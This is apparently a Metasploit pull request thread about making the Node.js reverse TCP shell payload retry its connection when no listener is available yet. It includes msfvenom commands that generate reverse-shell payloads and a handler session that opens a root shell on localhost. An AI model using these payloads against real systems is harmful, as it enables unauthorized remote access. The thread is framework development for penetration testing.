Enhancing the functionality on the nodejs shell_reverse_tcp payload.

[itsmeroy2012]

Description:

This update makes use of error handling in the NodeJs shell_reverse_tcp payload. Before when the server wanted to connect to the client to get a shell, the listener was required to be set up at first. This particular enhancement feature does not require the listener to be set up before the payload is executed.

Previous scenario:

Creating the payload:

root@kali:~/Framework/msf/metasploit-framework# ./msfvenom -p nodejs/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 > /root/Desktop/node_met/old_payload.js
No platform was selected, choosing Msf::Module::Platform::NodeJS from the payload
No Arch selected, selecting Arch: nodejs from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 595 bytes

Executing the payload without setting up a listener or a reverse tcp handler:

root@kali:~/Desktop/node_met# node old_payload.js
events.js:160
      throw er; // Unhandled 'error' event
      ^

Error: connect ECONNREFUSED 127.0.0.1:4444
    at Object.exports._errnoException (util.js:1022:11)
    at exports._exceptionWithHostPort (util.js:1045:20)
    at TCPConnectWrap.afterConnect [as oncomplete] (net.js:1090:14)

After this addition:

Creating the payload:

root@kali:~/Framework/msf/metasploit-framework# ./msfvenom -p nodejs/shell_reverse_tcp LHOST=127.0.0.1 LPORT=8443 > /root/Desktop/payload.js
No platform was selected, choosing Msf::Module::Platform::NodeJS from the payload
No Arch selected, selecting Arch: nodejs from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 695 bytes

Executing the payload:

root@kali:~/Desktop# node payload.js

NOTE: No Error occurs

Setting up the listener later:

msf > use multi/handler
msf exploit(handler) > set payload nodejs/shell_reverse_tcp 
payload => nodejs/shell_reverse_tcp
msf exploit(handler) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf exploit(handler) > set LPORT 8443
LPORT => 8443
msf exploit(handler) > exploit
[*] Exploit running as background job 0.

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:8443 
msf exploit(handler) > [*] Command shell session 1 opened (127.0.0.1:8443 -> 127.0.0.1:48072) at 2017-10-12 18:57:59 +0530
whoami
[*] exec: whoami

root
msf exploit(handler) > sessions -i

Active sessions
===============

  Id  Name  Type                 Information  Connection
  --  ----  ----                 -----------  ----------
  1         shell nodejs/nodejs               127.0.0.1:8443 -> 127.0.0.1:48072 (127.0.0.1)

msf exploit(handler) >

[sempervictus]

Awesome, thank you. Aside from the loop concern, seems rational to me. Adding to test queue.

[sempervictus]

MaxRetries should be taken into account, this will loop ad nauseum.

[itsmeroy2012]

The loop runs like around 30+ times per second. If a MaxRetry value is specified, it will have to be in the range of ten thousands to keep the payload running for just a couple of minutes. @sempervictus

[jmartin-tech]

This is doing a connect outbound, so having a backoff at the least should be added, a MaxRetry could then be set to a reasonable value as well.

Each StagerRepeat() can be called at least a few seconds apart and multiple failures in a row should extend the delay.

[itsmeroy2012]

I'm not very well accustomed to the nodejs predefined functions. Is there a similar function like time.sleep() in node as there is in python? @jmartin-r7 @sempervictus

[itsmeroy2012]

What is new?

For generating the payload we can now use StagerRetryWait (for the number of seconds it has to wait until it will loop again) and StagerRetryCount (for the number of times the payload will loop).

Method to generate the payload:

root@kali:~/Framework/msf/metasploit-framework# ./msfvenom -p nodejs/shell_reverse_tcp_ssl LHOST=127.0.0.1 LPORT=4545 StagerRetryCount=2 StagerRetryWait=15 > /root/Desktop/payload_ssl.js
No platform was selected, choosing Msf::Module::Platform::NodeJS from the payload
No Arch selected, selecting Arch: nodejs from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 828 bytes

NOTE: The payload will loop 2 times and will wait for 15 seconds each time

@sempervictus @jmartin-r7

[jmartin-tech]

Whitespace and style here is all over the place, note: "Metasploit requires spaces instead of hard tabs"

See https://github.com/rapid7/metasploit-framework/wiki/Style-Tips

I have offered a PR that I believe ends up a bit more readable and replace the hard tabs. @itsmeroy2012 take a look and merge if you are good with adjustments. I can complete testing and get this merged soon.

itsmeroy2012#7

[itsmeroy2012]

The commit by @jmartin-r7 was merged. I had one question though, how many contributions does one need, to get his/her name in the Author's list of the concerned payload module? @jmartin-r7 @sempervictus

[jmartin-tech]

@itsmeroy2012, payloads tend not to have authors directly associated. Any lines of code sourced from you in a PR will report in a git blame as from your account.

If you have a goal of seeing your name as an author, a new module implementing a PoC for a vulnerability that does not have a module contributed by the original author is an appropriate way to reach this goal.

Authors of modules are typically expanded when when an existing module can be expanded with a new vector or significantly re-implemented in a more reliable way.

[itsmeroy2012]

Thanks for merging this and also for answering my question. I'll keep working on the payloads and try to write a new module and hopefully get my name in the Author's list of a payload someday :) @jmartin-r7

[jmartin-tech]

Release Notes

The nodejs/shell_reverse_tcp payload now supports retry when the handler is not yet available.